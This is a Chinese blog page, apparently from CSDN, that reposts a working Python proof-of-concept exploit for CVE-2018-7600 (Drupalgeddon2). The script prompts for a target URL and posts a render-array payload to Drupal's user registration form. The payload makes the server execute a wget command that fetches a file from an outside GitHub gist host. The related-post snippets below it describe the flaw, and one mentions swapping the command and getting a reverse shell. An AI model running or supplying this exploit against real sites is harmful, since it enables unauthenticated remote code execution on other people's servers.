CVE-2018-7600

最新推荐文章于 2022-12-17 18:48:17 发布
最新推荐文章于 2022-12-17 18:48:17 发布
阅读量1.4k 收藏
点赞数
分类专栏: 渗透测试 文章标签: CVE-2018-7600 
 

CVE-2018-7600
 

#!/usr/bin/env
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = input('Enter target url (example: https://domain.ltd/): ')

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://gist.githubusercontent.com/a2u/66680e1f4abac79d654424ffdb1b410d/raw/d417bbfa8137a1ef53124522a87b1ad1d2b8ec96/hello.txt'}

r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
 

 


                

        

        

    




    

      

        

            

              
                
                  wilson_xpp
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Drupal远程代码执行漏洞(CVE-2018-7600)

				
			

			

				

					ANOrange的博客
				

				

					04-10
					
					358
					
				

			

		

		

			
				
Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。

			
		

	



                

              
                



	

		

			

				
					
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)

					
最新发布

				
			

			

				

					errorr0
				

				

					07-28
					
					1406
					
				

			

		

		

			
				
drupal命令执行

			
		

	



                


  
              

                


	

		

			

				
					
CVE-2018-7600】Drupal 8 远程代码执行漏洞

				
			

			

				

					Mr_atopos的博客
				

				

					06-07
					
					2705
					
				

			

		

		

			
				
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境
BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite

其他的可以随便设置

进入

这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试

通过查阅 Drupal 的代码和文档,可以知道,对于 

			
		

	





	

		

			

				
					
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现

				
			

			

				

					seek_2022的博客
				

				

					12-17
					
					4029
					
				

			

		

		

			
				
CVE-2018-7600漏洞学习与复现

			
		

	



		

			
		



	

		

			

				
					
drupal 7 ajax,【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行

				
			

			

				

					weixin_35700003的博客
				

				

					08-06
					
					1241
					
				

			

		

		

			
				
阅读:8,003CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出来之后大家都赶紧分析了一波,然后热度似乎慢慢退去了。两天前Drupalgeddon2项目更新了7.x版本的exp,实际环境也出现了利用,下面就简单来看一下0x01 概述CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出...

			
		

	





	

		

			

				
					
CVE-2018-8897

				
			

			

				

					08-01
				

			

		

		

			
				
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过

			
		

	





	

		

			

				
					
CVE-2018-18778.docx

				
			

			

				

					07-23
				

			

		

		

			
				
CVE-2018-18778 ,mini_httpd任意文件读取漏洞,

			
		

	





	

		

			

				
					
CVE-2018-8174_EXP:CVE-2018-8174_python

				
			

			

				

					05-16
				

			

		

		

			
				
CVE-2018-8174_EXP  用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口]  针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...

			
		

	





	

		

			

				
					
[Drupal]CVE-2018-7600 BUUCTF

				
			

			

				

					krysyal的博客
				

				

					03-29
					
					4554
					
				

			

		

		

			
				
[Drupal]CVE-2018-7600 BUUCTF
前期准备
进入之后环境安装
语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步


利用
直接使用网上公开的exp
	https://github.com/a2u/CVE-2018-7600
将exp里的命令换成env即可


反弹会话
可参考我上一篇文章,ssl反弹shell

...

			
		

	





	

		

			

				
					
MySQL Connectors组件8.0.12及之前版本的Connector/J子组件存在安全漏洞及其相关性分析

				
			

			

				

					gg1229505432的博客
				

				

					02-13
					
					5201
					
				

			

		

		

			
				
MySQL Connectors组件8.0.12及之前版本的Connector/J子组件存在安全漏洞及其相关性分析

			
		

	





	

		

			

				
					
Drupal CVE-2018-7600 漏洞利用和攻击

				
			

			

				

					weixin_34199405的博客
				

				

					04-26
					
					3921
					
				

			

		

		

			
				
背景介绍
2018年3月28日,Drupal Security Team官方发布了一个重要的安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站,该漏洞就是:CVE-2018-7600。
此消息一出,蠢蠢欲动的黑客们立马如天降尚方宝剑,都在暗处磨刀霍...

			
		

	





	

		

			

				
					
CVE-2018-7600 Drupal漏洞原理的简单分析与复现

				
			

			

				

					锋刃科技的博客
				

				

					11-12
					
					8350
					
				

			

		

		

			
				
0x00组件背景

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。

0x01漏洞位置



这里有个call_user_func_array

call_user_func_array函数是调用第一个参数的函数 传入的参数数第二个参数数...

			
		

	





	

		

			

				
					
drupal cve-2018-7600 远程代码执行漏洞 简介

				
			

			

				

					whatday的专栏
				

				

					06-13
					
					1530
					
				

			

		

		

			
				
漏洞分析

Drupal 在 3 月 28 日爆出一个远程代码执行漏洞,CVE 编号 CVE-2018-7600,通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理,比如如下的数组:


$form['choice_wrapper'] = array(
  '#tree' => FALSE, 
  '#weight' => -4, 
  '#prefix' => '<div class="clearfix" id="po

			
		

	





	

		

			

				
					
drupal 代码执行 (CVE-2018-7600)复现

				
			

			

				

					YouthBelief的博客
				

				

					11-04
					
					2488
					
				

			

		

		

			
				
@[TOC](drupal 代码执行 (CVE-2018-7600))
drupal 代码执行 (CVE-2018-7600)
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成
0x01 漏洞描述
http://blog.nsfocus.net/cve-2018-7600-analysis/
该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻

			
		

	





	

		

			

				
					
Drupal远程代码执行漏洞(CVE-2018-7600)

				
			

			

				

					yy
				

				

					03-31
					
					5430
					
				

			

		

		

			
				
一. 漏洞原理

   Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 ,Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。



二. 影响版本

Drupal 6.x
	Drupal 7.x
	Drupal 8.x
三. 漏洞环境搭建

...

			
		

	





	

		

			

				
					
【渗透测试】Drupal 漏洞 CVE-2018-7600 远程代码执行-复现

				
			

			

				

					SunnyCat
				

				

					01-11
					
					8548
					
				

			

		

		

			
				
Drupal 漏洞 CVE-2018-7600 远程代码执行-复现
漏洞简介:
Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。
漏洞原理:
drupal的注册页面,当我们提交的数据有问题时,它

			
		

	





	

		

			

				
					
CVE-2018-8034

				
			

			

				

					07-28
				

			

		

		

			
				
CVE-2018-8034是一个与Apache Tomcat相关的漏洞。根据提供的引用内容,我无法找到与CVE-2018-8034直接相关的信息。请提供更多关于CVE-2018-8034的信息,以便我能够为您提供准确的答案。 #### 引用[.reference_title]...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值